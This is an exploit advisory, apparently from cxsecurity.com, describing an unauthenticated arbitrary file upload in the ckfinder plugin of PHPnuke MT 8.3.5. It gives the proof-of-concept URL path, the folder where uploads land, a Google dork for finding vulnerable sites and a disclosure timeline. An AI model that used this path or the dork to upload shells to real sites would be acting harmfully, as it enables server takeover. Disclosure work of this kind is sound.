PHPnuke MT 8.3.5 ckfinder Shell Upload

2011.07.01
Credit: Net.Edit0r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: PHPnuke MT 8.3.5 ckfinder Plugin Arbitrary File upload Vulnerability # Date: 2011 06 27 [GMT +7] # Author: Net.Edit0r # Software Link: http://www.phpnuke.ir/ # Version : 8.3.5 # Tested on: ubuntu 11.04 ~ Centos # CVE : - --------------------------------------------------------------------------- PHPnuke MT 8.3 ckfinder Plugin Arbitrary File upload Vulnerability => RFU --------------------------------------------------------------------------- Author : Net.Edit0r Date: 2011 06 27 Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ~ [PoC] ~: /includes/ckfinder/ckfinder.html le.php ~ [PoC] ~: Http://[victim]/path-to-nuke//includes/ckfinder/ckfinder.html [ Upload To : /includes/ckfinder/files/Filename ] Dork: ~~~~~ Google : inurl:"PHP-Nuke Project By PHPNuke.ir" Vedio Demo: ~~~~~ http://net-edit0r.persiangig.com/nuke.rar Timeline: ~~~~~~~~~ - 24 - 06 - 2011 bug found. - 27 - 06 - 2011 vendor contacted, but no response. - 27 - 06 - 2011 Advisories release. Contact: ~~~~~~~~~ Net.Edit0r@att.net ~ Black.hat.tm@gmail.com --------------------------------------------------------------------------- Greetz To :DarkCoder | 3H34N | Amir-MaGiC | H3x | and all bhg member Spical Th4nks: B3hz4d | M4Hd1 | Cru3l.boy | Mikili | +_AttAcK_+ And All My Friendz [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People -------------------------------- [ EOF ] ----------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top